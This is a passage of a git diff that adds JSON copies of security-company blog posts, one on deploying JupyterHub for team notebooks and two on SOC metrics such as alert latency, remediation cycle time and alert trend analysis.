making the jump.\u201d Kayla Cummings, associate detection & response analyst Interested in joining our crew? We\u2019d love to hear from you !" 
+} \ No newline at end of file diff --git a/our-journey-to-jupyterhub-and-beyond.json b/our-journey-to-jupyterhub-and-beyond.json new file mode 100644 index 0000000000000000000000000000000000000000..43973f212ec96da0472396b35f95ebb0f4a76bfe --- /dev/null +++ b/our-journey-to-jupyterhub-and-beyond.json @@ -0,0 +1,6 @@ +{ + "title": "Our journey to JupyterHub and beyond", + "url": "https://expel.com/blog/our-journey-jupyterhub-beyond/", + "date": "Sep 3, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG Our journey to JupyterHub and beyond Security operations \u00b7 8 MIN READ \u00b7 PETER SILBERMAN \u00b7 SEP 3, 2019 \u00b7 TAGS: Get technical / How to / Managed detection and response / Planning / SOC If you\u2019re like us and you do technical research in a team, you\u2019ve likely run into a set of canonical problems. For example: You\u2019re looking at some amazing graphs done by someone who\u2019s on vacation (or doesn\u2019t work here anymore) and have no idea how they were generated. You\u2019re looking at python code that implements a formula from a paper, but you can\u2019t understand if that\u2019s a matrix multiplication or a typo. Sound familiar? We\u2019ve found several tools that help us solve these kinds of challenges. Chief among them is Jupyter Notebooks. If you aren\u2019t familiar, Jupyter Notebooks offers \u201can open-source web application that allows you to create and share documents that contain live code, equations, visualizations and narrative text.\u201d The (very few) pitfalls of Jupyter Notebooks Although notebooks are a great tool, we started running into a few bumps as soon we started to scale them across several teams. Here are some of the challenges we faced: Keeping content up to date was a pain and required all authors of notebooks to also know how to use git. Sharing research projects with different employees and teams required us to send notebooks via Slack or other means. Sharing notebooks from one user to another didn\u2019t always work due to package dependencies that one user had that another user didn\u2019t. Data sprawl was challenging \u2014 data was on employee laptops, couldn\u2019t easily be shared and would eventually need to be deleted by the employee. Managing credentials and API keys for each notebook wasn\u2019t convenient. There wasn\u2019t an easy way to \u201cproductionize\u201d a notebook \u2014 meaning we couldn\u2019t take a notebook that solved a problem for our operations team and make it available to everyone without sending it to them all or having them check out the notebook locally, install all dependencies and run the notebook when they wanted to use it. The good news, though, is that there are plenty of other tech teams that use notebooks, along with data science companies that help other orgs solve challenges just like these. So we looked into how Netflix uses notebooks ( Beyond Interactive: Notebook Innovation at Netflix , Part 2: Scheduling Notebooks at Netflix ). We even tried deploying AirBnB\u2019s Knowledge Repo. We looked at a couple data science platforms but quickly discovered that we\u2019d only need to use a small subset of their features so we couldn\u2019t justify the high cost. TL;DR: Our team loved Jupyter Notebooks but needed a more centralized model to make them work effectively across our company. JupyterHub saves the day After doing some additional research, we discovered JupyterHub. And it was exactly what we were looking for to help our notebook scale. What\u2019s JupyterHub, exactly? 
The JupyterHub website says it best: JupyterHub brings the power of notebooks to groups of users. It gives users access to computational environments and resources without burdening the users with installation and maintenance tasks. Users \u2013 including students, researchers, and data scientists \u2013 can get their work done in their own workspaces on shared resources which can be managed efficiently by system administrators. JupyterHub runs in the cloud or on your own hardware, and makes it possible to serve a pre-configured data science environment to any user in the world. It is customizable and scalable, and is suitable for small and large teams, academic courses, and large-scale infrastructure. In security nerd speak, JupyterHub creates a multi-user server where each user kernel is an isolated python process. This means that two users can run the same notebook with different input parameters and get different results \u2014 and that capability alone solves several of our problems. Benefits of centralizing notebooks using JupyterHub After setting up JupyterHub (more on that in a minute), we quickly discovered lots of benefits of centralizing our teams\u2019 notebooks: Notebooks are accessible across the org by default, which meant we didn\u2019t have to send .ipynb files back and forth. End users don\u2019t have to worry about keeping their content up to date in a GitHub repo \u2014 because users are doing their work in JupyterHub, notebooks are always up to date. Everyone uses the same environment with JupyterHub, which reduces the chances of the team running into dependency issues. There\u2019s no need to store data on employee laptops, which means you know where your customers\u2019 data is at all times. We provide a convenient way for users to leverage API keys and user credentials. We can \u201cproductionize\u201d a notebook simply by having a directory hierarchy that supports the notion of \u201csupported\u201d notebooks that are versioned (more on this later). This means we don\u2019t have to Slack users about updates to notebooks. Instead we can upgrade the notebook they\u2019re using on our central server. We centrally manage and monitor usage to keep customer data safe. How to set up JupyterHub When we build new infrastructure here at Expel or start to use new platforms, we always try to reuse previously defined engineering processes. In this case, we already use CircleCI for CI, GitHub for revision control and Ansible / Terraform for infrastructure management/deployment. We decided that using these existing tools and processes would make it easier to manage and scale the service over the long term (and it\u2019ll keep our Site Reliability Engineers (SREs) happy). Using our existing tools and processes also means we can easily manage packages, control versions of productionized notebooks and more. We also knew that for notebooks that were used by more than a few people, we should version those so that if something goes wrong we can easily roll them back. So our JupyterHub setup looks like this: We stood up our JupyterHub environment in Google Cloud Platform, but you could easily follow a similar workflow as shown above if you\u2019re using Microsoft Azure or Amazon Web Services or even setting this up on prem. JupyterHub (to its credit) has a lot of configuration options. These are accessible through jupyterhub_config.py . It\u2019s somewhat overwhelming how much you can configure. 
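For a sense of how little we actually had to touch, the sketch below previews the handful of jupyterhub_config.py settings covered in the rest of this section. Treat it as illustrative only: the OAuth authenticator class and the placeholder values are assumptions, and your identity provider, keys and secrets handling will differ.

```python
c = get_config()  # provided by JupyterHub when it loads jupyterhub_config.py

# OAuth login, so access rides on our identity provider (and its MFA enforcement).
# GenericOAuthenticator is shown as an example; use the class for your provider.
c.JupyterHub.authenticator_class = "oauthenticator.generic.GenericOAuthenticator"
c.GenericOAuthenticator.client_id = "REPLACE_ME"
c.GenericOAuthenticator.client_secret = "REPLACE_ME"

# Drop every user onto the shared "getting started" notebook after login.
c.Spawner.default_url = "/notebooks/Welcome.ipynb"

# Shared service credentials exposed to each user's kernel as environment variables,
# so individual notebooks never need to hard-code API keys.
c.Spawner.environment = {
    "DATADOG_API_KEY": "REPLACE_ME",
    "DATADOG_APP_KEY": "REPLACE_ME",
}
```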
To make it easier for you to wade through the many options, we\u2019ll share a couple of the configuration options that we tweaked and why. Authentication JupyterHub has amazing support for various authentication mechanisms. That\u2019s great for us. We choose to use OAuth which allows us to enforce multi-factor authentication but also gives Expel employees easy access. Default URL Using the default URL setting, we built a landing page which allowed new users to get up to speed faster. In practice, all we had to do was add this line of code within the JupyterHub configuration: c.Spawner.default_url = '/notebooks/Welcome.ipynb' This configuration forces a redirect when users log into a specific page. In our case the page provided new users with a set of \u201cgetting started\u201d tips including rules of the road \u2014 telling folks who are new what not to do (storing passwords and auth tokens in notebooks, for instance) to help them get off on the right foot. Even better, we provide examples of how to do those things correctly. Landing page We customized our landing page for JupyterHub Notebooks, and created a list of FAQs to address some of the questions our initial devs got used to answering. Here\u2019s a screenshot of our welcome page: Getting Started / Example notebooks: We have example notebooks that show how to log into our system and access data, and we also have example notebooks that access DataDog and other common services. Notebook header guidelines: We want to have some consistency in our notebooks so we ask users to follow a very simple template pattern so that it\u2019s easy to understand what the purpose of the notebook is etc. Below is the markdown we recommend Expel employees use when creating a new notebook: # Notebook Name ## Purpose What are you trying to do with this notebook? ## Audience Who is this notebook developed for? ## Data Sources * Data source 1 * Data source 2 ## Description (How does it work?) 1. Step 1 2. Step 2 3. Step 3 \u2026 ## Parameters Parameter | Description \u2014\u2014\u2014 | \u2014\u2014\u2014\u2013 PARAM_1 | Blah blah PARAM_2 | Blah blah ## References * Links to documentation or external references Environmental Variables We decided early on to make accessing various services as easy as accessing a list of defined environmental variables. We set all of our environmental variables via c.Spawner.environment which allows each instance of a notebook to have the same environmental variables. This way if a user wants to pull metrics from DataDog he doesn\u2019t have to generate his own API/APP key and instead can use the one on JupyterHub. The same is true for other services. More JupyterHub tips and tricks Once you\u2019ve got JupyterHub up and running, it\u2019s easy to perform simple tasks related to notebooks, like deploying new ones or managing notebook content. Here are a couple tricks we learned along our JupyterHub journey that might be helpful as you\u2019re getting JupyterHub set up in your own org. How to deploy new JupyterHub notebooks We\u2019ve gotten a lot of mileage out of applying some DevOps patterns to our JupyterHub deployment. As an example, we were able to leverage the github template repos to build a notebook template. This allows a new user to click a few buttons and have all the boiler-plate for running a notebook in our environment without having to cut-and-paste anything. This mirrors what we\u2019ve done in our product development, where we\u2019ve built out templates for services in Golang, Python and Node.js. 
We decided to create a template notebook repo (see the image above) to make it easy for authors to move and manage specific notebooks in GitHub. The CircleCI process I talked about earlier kicks off a build that packages the notebook and its tagged version into an RPM. This allows authors to version notebooks for deployment and allows us to roll them back if we accidentally introduce a bug. How to adjust filesystem permissions in JupyterHub One challenge we knew we needed to solve (and hoped JupyterHub could help) was to effectively manage notebook content on the filesystem in a way that allowed users to safely read and execute each other\u2019s notebooks. In order to do this, we tied unix groups and filesystem permissions together with our OAuth integration. Each new user is automatically added to a developer group that has read and execute privileges on all other home directories. This allows our analysts to run notebooks from other users, but not modify them. If a notebook is deemed operationally important, we\u2019ll move it out of a user\u2019s home directory, create a GitHub repo to manage the check-ins, tag releases of the notebook that build RPMs, and then deploy those RPMs to install the notebook in a specific directory (which is read-and-execute-only for all users). Then other team members can bookmark the location. To make sure we don\u2019t lose our work, we run daily backups and retain them for 14 days. Our experience with JupyterHub (so far) In just a few months of having JupyterHub operationalized, we\u2019ve seen awesome adoption among employees. Almost 100% of Expel employees who work with customers \u2014 that is, everyone from our SOC analysts to our customer success team \u2014 have logged into the server at some point. We\u2019ve seen an uptick in notebook creation, with 170 unique notebooks created in approximately two months\u2019 time on JupyterHub versus the 15 notebooks previously checked into GitHub. Up next for our use of JupyterHub at Expel is the ability to schedule parameterized runs of a set of notebooks. We\u2019re looking into using papermill or paperboy for this. In addition, as we move our production infrastructure to Kubernetes, we\u2019re looking to integrate the two tightly, allowing users to run kernels inside our Kubernetes infrastructure. If you\u2019re looking for ways to make research more accessible and easier to manage among your team(s), check out JupyterHub. Even if you don\u2019t have much experience with it, JupyterHub\u2019s documentation makes it easy for anyone to get up and running in no time. In the coming months we\u2019ll be releasing a few more blog posts that talk about specific use cases for JupyterHub \u2014 everything from using it for hunting decision support to how we\u2019re using JupyterHub for tuning detection thresholds. A huge thank you to Justin Willis and Reilly Herrewig-Pope on our infrastructure team. They were instrumental in helping configure, stand up and figure out how best to manage JupyterHub and our notebooks. Additionally, I\u2019d like to thank Andrew Pritchett and Brandon Dossantos for not being happy with the status quo of notebooks + GitHub." 
+} \ No newline at end of file diff --git a/performance-metrics-part-1-measuring-soc-efficiency.json b/performance-metrics-part-1-measuring-soc-efficiency.json new file mode 100644 index 0000000000000000000000000000000000000000..2238f30619982e8daecf64bc13dc340448f3aff1 --- /dev/null +++ b/performance-metrics-part-1-measuring-soc-efficiency.json @@ -0,0 +1,6 @@ +{ + "title": "Performance metrics, part 1: Measuring SOC efficiency", + "url": "https://expel.com/blog/performance-metrics-measuring-soc-efficiency/", + "date": "Sep 29, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Performance metrics, part 1: Measuring SOC efficiency Security operations \u00b7 10 MIN READ \u00b7 JON HENCINSKI, ELISABETH WEBER AND MOR KENANE \u00b7 SEP 29, 2020 \u00b7 TAGS: MDR / Metrics / SOC A head of a SOC team, an analytics engineer and a data scientist walk into a bar (or a Zoom chat nowadays) \u2026 Okay, so maybe it wasn\u2019t a bar, but we did come together to chat about metrics. The result is this three-part blog series. That\u2019s right \u2013 three blog posts! It\u2019s hard to cover all things SOC efficiency and leadership in just one post. And given that we\u2019ve been receiving a lot of questions around SOC metrics, we thought it would be helpful to spend some time defining what we mean by SOC metrics and how they are used to make sure our customers \u2013 and our team! \u2013 remain happy. The truth is: a lot of SOC burnout is the result of ineffective operations management. A SOC can be a great place to work. At Expel, metrics are more than measurements. Metrics help us take care of the team. Here\u2019s what we\u2019ll cover: In this first post, we\u2019ll share our thoughts on how to set up a measurement framework that helps SOC leads ensure goals are being met (and when they\u2019re not). The second post will dive in a little deeper to explore how to avoid burnout by guarding the system against volatility. In our final post, we\u2019ll share some IRL examples and what we did to achieve our aim. What are cybersecurity metrics, and why do we need them? Setting up a way to measure success is important to making sure you have an effective SOC . The way we see it, great leaders organize their teams around a compelling goal (or aim), arm the team with the right metrics to inform where they are in the journey and then get out of the way. There\u2019s no more strategic thing than defining where you want to get to and measuring it. Strategy informs what \u201cgreat\u201d means and measurements tell you if you\u2019re there or not. In this post, we\u2019re going to discuss how to create a strategy with a clear aim, share the metrics we use here at Expel to measure the efficiency of our SOC, along with each team member\u2019s unique perspective on why these measurements work. After hearing from our team, you\u2019ll be able to apply our approach as you establish goals for your own SOC. Create your cybersecurity metrics strategy A strategy starts with a compelling aim. To keep it simple: Goals are things you want, strategy is how you\u2019re going to get there and measurements tell you where you are in that journey. If you don\u2019t have an aim you might fall into the trap of measuring just to measure and the result could be a lot of work with no progress. Let\u2019s say you have your compelling aim of where you want to get to. You know what you want to measure. But do you have the data you need to measure? Before you can create great metrics you need to start with good, reliable data. 
So where should you get that data? In our case, our SOC analysts use a platform called Expel Workbench to perform alert triage, launch investigations and chase bad guys. We track a lot of the analyst activity and the data from that activity is accessible to us through our APIs. Through those APIs we can pull info like arrival time of an alert, the time when an analyst started looking at an alert, when an analyst closed an alert and more. It\u2019s important to note that while sometimes it\u2019s certainly okay to start by measuring the data you have available, we recommend that you understand what you want to measure (informed by your strategy) and invest the time, effort and energy in making that data available. To build, maintain and scale the Expel SOC we set clear aims, arm the team with Jupyter Notebooks , use data for learning and then iterate. Here\u2019s our formula for success: Clear aims + ownership of the problem + data for learning + persistence = success Define your goals These are the aims we identified for the Expel SOC: Has a firm handle around capacity: We know how much total analyst capacity we have, what the loading was for any given day or month, and we\u2019re able to forecast what loading will look like in the future based on our anticipated customer count. This will tell us how we\u2019re going to scale. Responds faster than delivery pizza: Thirty minutes or less to spot an incident and provide our customers steps on how to fix the problem. Improves wait times: Almost everything we touch in our SOC is latency sensitive. Wait times should improve. Improves throughput: If we\u2019re performing the same set of analyst workflows again and again, let\u2019s identify that and automate the repetitive tasks using our robots. Measures quality: Has a self-correcting process in place and finds opportunities for improvements and automation. Now that we\u2019ve shared our goals, let\u2019s talk about metrics. Develop cybersecurity metrics Next we\u2019re going to walk you through three metrics we think are fundamental to managing a SOC: When do alerts show up? (alert seasonality) How long do alerts wait before a robot or an analyst attends to them? (alert latency) How long does it take to go from alert to fix? (remediation cycle time) These metrics are key to measuring efficiency because they tell you when work shows up, how long work waits and how well the system is performing. W. Edwards Deming once said, \u201cEvery system is perfectly designed to get the result that it does.\u201d If we\u2019re slow to respond to alerts or incidents (30 minutes or less in our SOC), we know there\u2019s a flaw in the system. These three metrics help us understand how we\u2019re performing. For each measurement, we\u2019ll provide our perspectives on why we measure (from Jon, Expel\u2019s SOC lead) and how we build and optimize those measurements (from Elisabeth , Expel\u2019s data scientist, and Mor, Expel\u2019s analytics engineer). Metric #1: When do alerts show up? Jon\u2019s perspective: If we go back to our aim, we know that to build a highly effective SOC ( especially now that we\u2019re remote ) we need to have a firm handle around capacity and utilization. I need to know when alerts show up. That informs when folks on the team show up to work. If there\u2019s more loading in the morning, I\u2019ll make sure we have more analysts on shift in the beginning of the day. 
If we add a customer in an international time zone, I\u2019ll monitor and make sure the time when alerts show up doesn\u2019t change. If it does, I\u2019ll adjust when folks show up to work. Elisabeth\u2019s perspective: To figure out when work shows up, we started with some really basic metrics and then worked our way up to more complicated seasonality decomposition and capacity modeling (more to come in a future post). We started by simply looking at the median hourly alert count. Using this metric, we see at what times of day our volume spikes the most, and in turn, when we need to staff the most analysts. This is something we continue to track over time, and as you can see in the graph below, the pattern changed. The blue line shows the hourly counts for October 2019, the orange line shows the hourly counts for March 2020 and the green line shows hourly counts for July 2020. October data peaked between 10 a.m. and 4-5 p.m. ET. However, by March we started to see that line flatten a little and this trend continued into July. As we\u2019ve added more West Coast and international customers, our load became more consistent throughout the day. Median Hourly Alert Count in October 2019 vs. March 2020 vs. July 2020 We saw this shift happening thanks to the fact that we use alert seasonality as a metric. As a result, we were able to proactively staff more analysts later into the day to avoid any overload. Metric #2: How long do alerts wait? Jon\u2019s perspective: Almost everything we do in our SOC is latency sensitive. The longer an alert waits, the potential for downstream damage to a customer increases. Alert seasonality tells me when work shows up but alert latency tells me how quickly we\u2019re able to pick up work as it enters the system. If alerts latency times are high this tells me one of three things is happening: we don\u2019t have enough capacity to keep up, we\u2019re spending too much time chasing bad leads or we\u2019re over subscribed responding to incidents. The key here is to set wait time goals \u2013 you may call these Service Level Objectives (SLOs) \u2013 then monitor and adjust. You don\u2019t want to tune to your relative capacity here. The trick is to find where you can use technology and automation to hit your targets and make this easy on the team. Mor\u2019s perspective: Alert latency is a fairly simple calculation. We measure the time between two timestamps: The time an alert entered the queue; and The time when that same alert was first actioned. If an alert entered the queue at 11 a.m. ET and the first action was performed 20 minutes later, the alert latency is 20 minutes. We measure alert latency for every alert that enters the queue to understand how long alerts are waiting and if we\u2019re within tolerance of our SLOs. Alert latency is important within the context of SOC operations. If you\u2019re considering setting an aim to pick up alerts fast \u2013 consider these two key factors. Measure the 95th percentile \u2013 not the median: At Expel, when measuring alert latency, we use the 95th percentile. So in essence, our metric helps us understand how long alerts wait before first action 95 percent of the time. If we were to use the median latency, that\u2019d only tell us how long alerts wait 50 percent of the time. In doing so we may think we\u2019re more effective than we really are. Bottom line: Use the 95th percentile or higher to understand alert latency. Not all alerts are created equal: Alerts show up with different severities. 
Each severity has a different SLO. At Expel an alert can be labeled with one of five different severities: Critical High Medium Low Tuning The easiest way to think about severity is confidence + impact = severity . If I\u2019m confident that when an alert fires it will be a true positive AND it will lead to really bad outcomes for a customer, the alert will be labeled with a critical severity. We\u2019ll set an SLO that our SOC will pick those up within five minutes. The SLOs increase in time as we become less confident that the alert will be a true positive. When I built this metric, understanding that I needed to slice and dice by alert severity was super important. We track alert latency weekly and monthly, broken out by severity. When we review alert latency as part of our weekly check, we\u2019ll record our performance in a simple table (like the one below): Alert Latency Alert Severity | SLO | 95th % Critical | 5 minutes | \u2713 High | 15 minutes | \u2713 Medium | 2 hours | \u2713 Low | 6 hours | \u2713 Tuning | 12 hours | \u2713 Alert latency table When reviewing alert latency on a month-to-month basis, trending out performance in a time series distributed by severity allows us to spot performance issues. For example, if our SLO times for low severity alerts start to increase, we know that if we don\u2019t act we\u2019ll likely see our medium, high and critical SLO times degrade. Our lower severity SLO times act as a leading indicator. The key is to monitor and adjust. Alert latency time series summarized monthly, broken out by severity Jon\u2019s perspective: To amplify what Mor said, if I see SLO times for low and tuning alerts trend in the wrong way (things are taking too much time), I know we need to act now or SLOs for >=medium severity will degrade over time. As Mor said, the key is to monitor and adjust. And by adjust I don\u2019t mean tell the team to \u201cwork faster.\u201d Never do this. You need to understand the work that\u2019s showing up, optimize detections, tune and apply filters where needed and automate. We wrote a blog post on how our SOC analysts use automation to triage alerts, in case you\u2019re interested in learning more about how that process plays out. Metric #3: How long does it take to go from alert to fix? Jon\u2019s perspective: This is another measurement focused on time. Remediation cycle time is the time it takes a SOC analyst to pick up an alert, declare an incident, orient and provide remediation actions to our customers. I believe that speed matters when dealing with an incident, and measuring alert-to-fix times is a good way to understand SOC performance. In fact, we provide this metric in every incident \u201cFindings\u201d report to our customers. Alert-to-fix timeline \u2013 included with every Expel incident \u201cFindings\u201d report We review alert-to-fix times weekly, and anytime we don\u2019t meet our mark of 30 minutes or less, we take a look at the incident and find ways to improve. It\u2019s data for learning. You may be thinking: but what about quality control? When optimizing for speed I highly recommend you back that with a quality control program . Mor\u2019s perspective: This is another straightforward calculation. We measure the time between two timestamps: The time an alert entered the queue; and The time the first remediation recommendations were provided to the customer. 
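To make both timestamp-based measurements concrete, here's a small sketch assuming a pandas DataFrame with illustrative column names (queued_at, first_action_at, remediation_sent_at, severity). The file name, schema and SLO values are placeholders for the example, not a real export.

```python
import pandas as pd

# Illustrative export: one row per alert with three timestamps and a severity label
alerts = pd.read_csv(
    "alerts.csv",
    parse_dates=["queued_at", "first_action_at", "remediation_sent_at"],
)

# Alert latency: queue entry -> first action, in minutes
alerts["latency_min"] = (alerts["first_action_at"] - alerts["queued_at"]).dt.total_seconds() / 60

# Remediation cycle time: queue entry -> first remediation recommendation, in minutes
alerts["cycle_min"] = (alerts["remediation_sent_at"] - alerts["queued_at"]).dt.total_seconds() / 60

# 95th percentile (not the median), broken out by severity
p95 = alerts.groupby("severity")[["latency_min", "cycle_min"]].quantile(0.95)

# Compare against illustrative SLOs (in minutes) to build the weekly check table
slo_min = {"Critical": 5, "High": 15, "Medium": 120, "Low": 360, "Tuning": 720}
p95["latency_slo_met"] = p95["latency_min"] <= p95.index.map(slo_min)
print(p95)
```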
When we talked about alert queue times we mentioned that we label alerts with a severity (there are five) and that severity is a notion of confidence + impact. In practice, when an alert labeled with a \u201ccritical\u201d or \u201chigh\u201d severity fires, it usually means we spotted a threat rather than a false positive condition. Not necessarily all of the time, but most of the time. This allows us to measure and optimize wait times. We take a similar approach with incident remediation cycle times. We break out incidents into four categories: Non-targeted incidents (think commodity malware \u2013 Hello, EMOTET!) Targeted incidents (the bad guy wants to break into your organization) Business email compromise (there\u2019s so much of this it has its own class) Policy violations (someone did a thing that resulted in risk for the org) This allows us to understand how quickly we\u2019re able to respond based on the type of incident we detected. Are alerts waiting in the queue for non-targeted incidents? Are we spending too much time fighting the SIEM to figure out how many users received that phishing email? How much time are we spending writing an update vs. investigating? Can we optimize that? It all matters. We break out incident remediation cycle times by the class of incident, inspect what\u2019s happening and use the data to learn and improve. Here\u2019s an example of how we optimized incident remediation cycle times for Business Email Compromise incidents. TL;DR \u2013 We automated alert triage, investigation and response, and optimized how we communicate information to our customers. Our SOC analysts focus on making complex decisions and we use tech for the heavy lifting. Knowing how long the work takes is a good first step \u2013 but break the data out into buckets to help you understand where to get started. You\u2019ve got your goal and your data \u2026 what now? Before you \u201cmeasure all the things\u201d remember to have a compelling aim. If you don\u2019t and just measure what\u2019s available, you may be optimizing for the wrong outcome \u2013 doh! After we defined our strategy, we talked about fundamental metrics to know when alerts show up, how long they wait and how long it takes to spot an incident and provide our first recommendation on how to stop it. In our next post, we\u2019ll talk about the metrics we use to monitor the SOC end-to-end system as a whole. In our final post we\u2019ll share SOC metric success stories. Make sure you subscribe to our blog so that you\u2019ll get the posts in the rest of this series sent right to your inbox. Resource sharing is caring Want a TL;DR version of this for quick reference in the future? 
Expel\u2019s SOC management playbook: Define where you want to get to (your strategy) Deploy measurements to help guide you and the team Learn how to react to what the measurements are telling you Iterate Persist Celebrate" +} \ No newline at end of file diff --git a/performance-metrics-part-2-keeping-things-under-control.json b/performance-metrics-part-2-keeping-things-under-control.json new file mode 100644 index 0000000000000000000000000000000000000000..9bc06c494511efb6d277ce3db7fd4c2edf7b1182 --- /dev/null +++ b/performance-metrics-part-2-keeping-things-under-control.json @@ -0,0 +1,6 @@ +{ + "title": "Performance metrics, part 2: Keeping things under control", + "url": "https://expel.com/blog/performance-metrics-keeping-things-under-control/", + "date": "Oct 20, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Performance metrics, part 2: Keeping things under control Security operations \u00b7 9 MIN READ \u00b7 JON HENCINSKI, ELISABETH WEBER AND MOR KENANE \u00b7 OCT 20, 2020 \u00b7 TAGS: Careers / MDR / Metrics / Tech tools Metrics aren\u2019t just for status reports, mmmkay . Effective SOC managers embrace data and use metrics to spot and fix problems. At Expel, reviewing metrics and adjusting is how we take care of the team \u2013 and our customers! In this part-two installment of our three-part blog series on all things SOC metrics and leadership, we\u2019ll dive in a little deeper to explore how we use data to spot potential warning signs that SOC analyst burnout is ahead \u2013 a critical factor in SOC performance. How to predict SOC analyst burnout You know \u2026 that feeling of defeat? When empathy is suddenly replaced with apathy because too many alerts are showing up, and they\u2019re taking too long to handle? Management just doesn\u2019t seem to have their finger to the pulse on the current state of things? Nothing changes because \u201cthat\u2019s how we\u2019ve always done it!\u201d You begin asking: \u201cIs this what I signed up for?\u201d Yeah, that\u2019s what we mean by SOC burnout. And it\u2019s common. In fact, it\u2019s something many of us have experienced at prior jobs. Just like investigations, effective operations management is rooted in the quality of questions asked. In this blog post, we\u2019ll share operations management metrics, the techniques we use to gather the right data and tips-and-tricks for how to analyze the data and implement your learnings. Here\u2019s what we\u2019ll talk about: Operations Management Metric Question(s) Technique Tools Did the daily mean number of alerts change? When did it last change? Change-Point Analysis Python \u2013 there are lots of examples on GitHub What\u2019s the daily alert trend? Is it up, down or steady? Time Series Decomposition Python \u2013 statsmodels.tsa.seasonal library Is my alert management process in a state of control? Or are things totally borked? Time Series Decomposition Shewhart control chart If terms like time series decomposition, residuals, seasonality and variance are new to you \u2013 don\u2019t worry. No previous experience required. We\u2019ll walk you through each of these operations management metrics and how these techniques are applied. Metric #1: What\u2019s the mean number of alerts we handle per day? Technique: Change-Point Analysis Tool: Python TL;DR: You need to understand how many alerts show up each day. And if that number changes you need to know when and why. 
You likely don\u2019t have infinite SOC capacity (people), and if too many alerts are showing up relative to your available capacity, you\u2019re going to be in trouble. Change-Point Analysis is our Huckleberry here . Elisabeth\u2019s perspective: Change-Point analysis is a method for finding statistically significant changes in time series data. What does statistically significant mean? In this case, that just means the change in alert data is significant enough to indicate that it\u2019s more than just typical daily noise. It helps us spot changes like these: Change-Point graph showing where changepoints were identified in daily alert count data with context. When we detect a significant change, we ask questions like: Did we onboard a new customer on that day? Did we release a new vendor integration? Did a vendor release any new features? Were there any big alert spikes? Is there any on-going red team activity? Bottom line: If we don\u2019t have an explainable cause, we dig deeper to understand what happened so we can adjust. We then ask ourselves questions like: Do we need to spend time \u201ctuning\u201d detection rules? Do we need to write a new investigation workflow to automate repetitive tasks? Sometimes we even ask ourselves if we just need to turn off a detection because the juice ain\u2019t worth the squeeze. Jon\u2019s perspective: Change-Point analysis tells me how many alerts we handle each day. When we see a significant change (up or down) we immediately spring into action to understand why. For example, by looking at the Change-Point graph Elisabeth just shared, I was able to see that: Between May 1, 2020 throughJune 21, 2020 the daily alert count was relatively steady \u2013 the mean did not change. On June 21, 2020 the mean daily alert count doubled! Why? Cobalt Strike . It\u2019s always Cobalt Strike. I\u2019m not joking. It was a red team \u2013 the customer didn\u2019t want to remove access \u2013 so we had a ton of true positive alerts for the activity. We were able to handle the increase by using tech (automation). On July 5, 2020 the mean daily alert count went down a bit as the customer removed BEACON agents. On July 13, 2020 things were mostly back to \u201cnormal.\u201d What did we do after looking at the data? First, we noted the significant change. Then we quickly reviewed our detection metrics to understand why the daily alert count doubled (hello, BEACON agent). Lastly, we used tech , not people, to handle the increased alert loading. A super quick time series decomposition interlude Technique: Time Series decomposition Tool: Python, statsmodels.tsa.seasonal library Elisabeth\u2019s perspective: Time series decomposition is a method for splitting time indexed data into three pieces: trend, seasonality and residuals. This split is done in an additive way like you see in the below equation. Trend + Seasonality + Residuals = Observed Value Let\u2019s break each piece down a bit further: What\u2019s the trend? This is the general directional movement that we see in the data. You can think of this like smoothing out all the small bumps in the raw data to get a better view of the true directional movement. What\u2019s seasonality? These are the repeated patterns that we see. Depending on how your data is aggregated, these could be hourly, daily, weekly, monthly or even yearly patterns. For example, when we look at daily aggregated data, we tend to see higher alert volume on weekdays compared to weekends. What are residuals? 
This is everything that is leftover after removing the trend and seasonality. This is basically the noise in the data, or the parts that can\u2019t be attributed to the trend or seasonality. To perform seasonal decomposition, we use the seasonal_decompose function from the Python statsmodels.tsa.seasonal library. Since we\u2019re running this analysis on aggregated daily alert counts, we prep our data by summing the total number of daily alerts and formatting the data to be date indexed. Once the data is formatted, the basic seasonal decompose can be achieved with just a couple lines of code: Seasonal_decompose function from statsmodels.tsa.seasonal And here\u2019s the resulting visual: Output of `result.plot()` Now our time series data is split into the trend, seasonality and residuals. This allows us to answer key operational questions that we\u2019ll cover next! Metric #2: What\u2019s the daily alert trend? Technique: Trend analysis Tool: Tableau (or any visualization tool) TL;DR: You can use what happened in the past to predict what will happen in the future. And what goes up doesn\u2019t always come down unless we take action. We examine the daily alert trend to manage our alerts so they don\u2019t manage us. Jon\u2019s perspective: One of the most important questions SOC leaders should ask is: What\u2019s the daily alert trend? Is the trend going up, going down, is it steady or do we see transient spikes? Your answer to this question will determine if and how you need to spring into action. Recall from above, we use the seasonal_decompose function from the Python statsmodels.tsa.seasonal library to split our daily alert counts into three pieces: Trend Seasonality; and Residuals aka \u201cthe leftovers\u201d We do this via Jupyter Notebook to make it easy and export the results to a CSV that looks like this: CSV output of Time Series decomposition We then use a visualization tool, Tableau in this case, to examine the daily alert trend. Here\u2019s what that looks like: Daily alert trend visualization Let\u2019s talk about what\u2019s going on here. Between July 2020 and August 2020 we experienced a slight downward trend, but the trend was relatively stable. When we see something like this we take the action to make sure we weren\u2019t over tuning and perhaps even be a bit more aggressive with detection experiments. In the middle of August 2020 we see a couple big spikes mostly the result of a bad signature (it happens!) followed by a quick recovery to daily alert levels seen previously. Our call to action was to tune out the noise from the bad signatures. In the middle of September 2020 things get interesting. We see an upward trend that looks like a slow and steady climb. A pattern that looks like this always grabs my attention. This is very different from a big spike! Why? A slow and steady climb is likely indicative of more and more alerts showing up each day from different technologies. More alerts + increased variety = heavy cognitive loading And just like alerts, you have to manage cognitive loading. Because if you don\u2019t, well, SOC burnout has entered the chat. The call to action here is to understand the situation, figure out where the increased loading is coming from (new signature, product updates, etc.) and react. In this case two of the vendors we work with released product updates and we needed to tweak our detection rules to reduce false positive alerts. In late September 2020, you\u2019ll see a recovery to alert levels we\u2019ve previously seen. 
